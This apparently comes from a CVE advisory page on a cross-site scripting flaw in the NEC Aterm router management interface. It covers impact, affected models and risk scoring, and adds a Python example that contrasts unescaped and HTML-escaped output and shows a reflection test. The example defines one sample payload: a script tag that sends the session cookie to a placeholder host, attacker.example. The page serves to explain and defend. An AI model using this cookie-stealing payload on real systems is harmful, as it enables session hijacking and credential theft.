Impact
The flaw is a cross-site scripting (XSS) vulnerability, CWE-79, in the Aterm web management interface. An attacker on an adjacent network who can get a user to open crafted content can inject script that runs in that user's browser in the context of the management interface. Because the injected script executes with the privileges of the victim's browser session, it can steal credentials, alter what the interface displays, drive the interface on the logged-in user's behalf, redirect the user to phishing sites, or perform other client-side actions. The vulnerability is confined to the browser: it does not by itself give code execution on the device's operating system.
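As an added illustration (not code from the advisory or from the Aterm firmware, whose actual injection point is not described on this page), the Python below shows the CWE-79 pattern in the abstract: a hypothetical status page that reflects a `hostname` value into HTML without encoding, next to the encoded versions for body and attribute context, plus the reflection check a tester would use to confirm whether a response echoes markup unencoded. The page, parameter name and payload are constructed for the example.

```python
import html

# Constructed sample payload of the kind the Impact section describes:
# exfiltrate the session cookie to an attacker-controlled host.
# (attacker.example is a placeholder, not a real host.)
XSS_PAYLOAD = '<script>fetch("http://attacker.example/?c=" + document.cookie)</script>'


def render_unsafe(hostname: str) -> str:
    """Vulnerable pattern (CWE-79): user-controlled text is concatenated
    straight into the HTML body, so markup in it becomes markup in the page."""
    return f"<p>Host name: {hostname}</p>"


def render_safe(hostname: str) -> str:
    """Hardened pattern for body context: HTML-encode the value so that
    '<', '>', '&' and quotes are displayed as text, not parsed as tags."""
    return f"<p>Host name: {html.escape(hostname, quote=True)}</p>"


def render_attr_safe(hostname: str) -> str:
    """Same value inside a quoted attribute: quote=True also encodes the
    quote characters, so the attribute cannot be closed early to start a tag."""
    return f'<input name="hostname" value="{html.escape(hostname, quote=True)}">'


def reflects_unencoded(body: str, canary: str) -> bool:
    """Tester's check: does the response echo the canary with its HTML
    metacharacters intact? True means the reflection point is injectable."""
    return canary in body


if __name__ == "__main__":
    # A harmless probe string (constructed) that carries the characters an
    # XSS payload needs: a quote, a tag close and a tag open.
    canary = '"><x-xss-probe>'
    for label, render in (("unsafe", render_unsafe),
                          ("safe", render_safe),
                          ("attr", render_attr_safe)):
        out = render(canary)
        print(f"{label:6s} reflects unencoded: {reflects_unencoded(out, canary)}")
        print("       ", out)
```

The encoding has to match the output context: `render_safe` is correct for text between tags, `render_attr_safe` for a quoted attribute value; a value placed inside a `<script>` block or a URL needs a different encoder, which is why the check is run against every reflection point rather than once per page.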
Affected Systems
The affected hardware comprises the following NEC Platforms models: Aterm 19000T12BE, GX621A1, SH621A1, WX11000T12, WX1800HP, WX3000HP2, WX4200D5, WX5400HP, and WX7800T8. The advisory does not list specific firmware versions, so every listed model should be treated as vulnerable until NEC Platforms publishes fixed firmware and the device has been updated to it.
Risk and Exploitability
A CVSS base score of 4.8 places the vulnerability in the Medium severity range. No EPSS (exploit probability) score is provided, and the vulnerability is not listed in the CISA Known Exploited Vulnerabilities (KEV) catalog, so there is no public record of in-the-wild exploitation at this time. Exploitation requires network access to the web management interface from an adjacent segment (the device's own LAN or Wi-Fi, for example) plus a user who opens the crafted content in a browser, so exposure is limited to hosts that can reach the Aterm management portal. Because the impact is client-side, the device firmware is not directly compromised, but the credentials and confidentiality of any user who visits the interface while the attack is active can be, and a logged-in administrator's session can be abused to act through the interface.
OpenCVE Enrichment